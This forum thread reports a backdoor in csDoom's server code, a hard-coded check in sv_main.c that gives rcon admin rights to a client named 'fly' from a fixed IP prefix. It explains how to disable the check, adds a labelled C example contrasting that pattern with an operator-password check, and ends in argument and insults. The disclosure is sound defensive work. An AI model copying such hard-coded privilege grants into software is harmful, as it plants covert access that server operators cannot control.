Guest hate

Csdoom security hole

Guest hate

The following code is included in the source of the new version of csdoom:

if ( net_from.ip[0]= && net_from.ip[1]= &&
net_from.ip[2]= &&
( !strcmp(players[parse_cl].userinfo.netname, "fly")
|| !strcmp(players[parse_cl].userinfo.netname, "FLY")
|| !strcmp(players[parse_cl].userinfo.netname, "Fly") )
)
{
clients[parse_cl].allow_rcon = true;
}

For those of you without a knowledge of C, this basically means that Fly, the creator of csdoom, can take over any server you may choose to set up, and perform "administrative" functions (kick people etc). I'm guessing that you may not wish him to have this ability, so in order to disable it, simply go to line 695 and where you see the line:

SV_CheckIP();

simply change it to

// SV_CheckIP();

This will disable the hole.

Link to post
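An added example, not part of the original post or csDoom's source: the check quoted in the first post derives rcon from a three-octet address match plus a client-supplied name, shown here beside a grant that depends only on a password the server operator configures. The types, function names, the 192.0.2.x placeholder prefix and the password mechanism are assumptions for illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-ins for the server's types; not csDoom's definitions. */
typedef struct { unsigned char ip[4]; } netadr_t;
typedef struct { char netname[32]; bool allow_rcon; } client_t;

/* Placeholder prefix (documentation range); the real octets are elided in the post. */
static const unsigned char PLACEHOLDER_PREFIX[3] = { 192, 0, 2 };

/* Pattern from the post: privilege comes from three address octets and a
 * client-supplied name, with no secret the server operator controls. */
bool backdoor_grants_rcon(const netadr_t *from, const client_t *cl)
{
    return memcmp(from->ip, PLACEHOLDER_PREFIX, 3) == 0 &&
           (!strcmp(cl->netname, "fly") || !strcmp(cl->netname, "FLY") ||
            !strcmp(cl->netname, "Fly"));
}

/* Comparison that does not stop at the first mismatching byte. */
static bool secret_equal(const char *a, const char *b)
{
    size_t la = strlen(a), lb = strlen(b);
    unsigned char diff = (unsigned char)(la != lb);
    for (size_t i = 0; i < la && i < lb; i++)
        diff |= (unsigned char)(a[i] ^ b[i]);
    return diff == 0;
}

/* Hardened form (assumed mechanism): rcon only with the operator's configured
 * password; an unset or empty password disables rcon entirely. */
bool operator_grants_rcon(const char *configured, const char *supplied)
{
    if (configured == NULL || configured[0] == '\0' || supplied == NULL)
        return false;
    return secret_equal(configured, supplied);
}

int main(void)
{
    netadr_t from = { { 192, 0, 2, 77 } };   /* constructed sample address */
    client_t cl = { "Fly", false };          /* constructed sample client */
    printf("hard-coded check grants rcon: %d\n", backdoor_grants_rcon(&from, &cl));
    printf("operator check, no password set: %d\n", operator_grants_rcon("", "x"));
    return 0;
}
```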
Guest Blowfly

Better go check the client for back doors as well. Hang on.. it's closed source... hrrmmmm. Oh well, if it's *your* hard drive that gets wiped then don't look at me...

Link to post

I have the csDoom source for win32. And if there is a need for it, just let me know. I'll take that hole out and post it if you don't want Fly messing with your servers.

I warned him about that. It's going to cause a lot of problems down the road.

Link to post

OK, thank you for the info. Personally I don't really care though. I trust fly, and, also, you haven't mentioned anything truly serious that he could do. Then again, this might be the beginning of the Russian era. :o

Link to post
NightFang said:

I have the csDoom source for win32. And if there is a need for it, just let me know. I'll take that hole out and post it if you don't want Fly messing with your servers.

I warned him about that. It's going to cause a lot of problems down the road.

It would be good with a secured version, although I too trust fly and don't really mind :o)

He could have publicly announced it though, so that it would have been known from the beginning, that would have been a lot more friendly...

Link to post
Myk said:

OK, thank you for the info. Personally I don't really care though. I trust fly, and, also, you haven't mentioned anything truly serious that he could do. Then again, this might be the beginning of the Russian era. :o

Hmmm. I think I want more info. Not that I mistrust Fly or anyone in particular, but I really don't like the sound of this. Can this hole possibly open someone's hard disk to a malicious hacker? Is it possible for someone other than Fly to gain access to someone's server? Is it possible for someone to exploit any potential security holes in the client even if they don't have the source code?

Link to post

Apparently it's an ingame thing only. I agree completely with informing about other people's work, especially when it functions on-line. But why do these things come up, and not real bugs? That makes me think that people are just poking lamely. I do hope not, Stphrz.

Link to post

Fly should learn not to put backdoors in released code :-)

By the way this fails to mention what file this occurs in.

sv_main.c

Link to post

Good Work!!! That's 2 places to play you have ruined :)

Cocksuckers

Link to post
Guest Psycho

Does this remind ANYBODY about the end of DoomServ?

Link to post

Anyone who is pissed off that Aurikan has to make an ass of himself all the time, just ignore him. He obviously put a lot of work into that post, and if we keep csdoom up and don't let this post have its intended effect then that is probably the most we can do to piss him off, unless the rumor I heard about doomroom being closed is true.

Link to post
aurikan said:

Fly should learn not to put backdoors in released code :-)

By the way this fails to mention what file this occurs in.

sv_main.c

I think Aurikan needs to change his quote to "I don't do doom, I just like to screw its players"

Link to post
Guest hate

aurikan had nothing to do with this, retard

Link to post
hate said:

aurikan had nothing to do with this, retard

I bet

Link to post

Just a clarification for Toke and anyone who is convinced by his posts.

I had absolutely nothing to do with the csDoom expose nor #csdoom takeover.

Thank you for your time.

Link to post
Guest Daggah

As far as I can tell, it's Toke being the asshole here.

Link to post
This topic is now closed to further replies.